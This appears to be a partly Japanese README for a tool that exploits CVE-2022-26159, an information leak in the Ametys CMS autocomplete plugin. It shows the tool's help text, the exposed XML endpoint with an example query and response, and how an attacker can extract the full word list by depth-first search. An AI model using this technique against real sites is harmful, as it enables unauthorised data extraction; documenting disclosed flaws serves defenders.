$ ./CVE-2022-26159-Ametys-Autocompletion-XML.py -h
CVE-2022-26159-Ametys-Autocompletion-XML v1.1 - by @podalirius
usage: CVE-2022-26159-Ametys-Autocompletion-XML.py [-h] -t TARGET [-H HEADERS] [-k] [-v | -q] [--no-colors]
Description message
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
arg1 help message
-H HEADERS, --header HEADERS
Specify HTTP headers to use in requests. (e.g., --header "Header1: Value1" --header "Header2: Value2")
-k, --insecure Disable SSL/TLS warnings and certificate verification.
-v, --verbose Verbose mode. (default: False)
-q, --quiet Quiet mode. (default: False)
--no-colors Disables colored output. (default: False)
Ametys CMS <= 4.4.0 のオートコンプリートプラグインは、以下のアドレスでワードリストを含む XML ファイルを公開しています。
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml
このデータベースにリクエストを送信するには、攻撃者は q(クエリ)パラメータに単語の先頭を入力するだけです。
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml?q=adm
そしてオートコンプリートプラグインは、adm(クエリ)で始まる最初の10個の一致する単語を XML ファイルで返します。
<?xml version="1.0" encoding="UTF-8"?>
<auto-completion>
<item>administrateur</item>
<item>administrateurs</item>
<item>administratif</item>
<item>administratifs</item>
<item>administration</item>
<item>administrations</item>
<item>administrative</item>
<item>administratives</item>
<item>administres</item>
<item>admission</item>
</auto-completion>
これを踏まえて、攻撃者は API に対する深さ優先探索 を実行するだけで、その内容をすべて抽出できます。
プルリクエストは歓迎します。他の機能を追加したい場合は、遠慮なく issue を開いてください。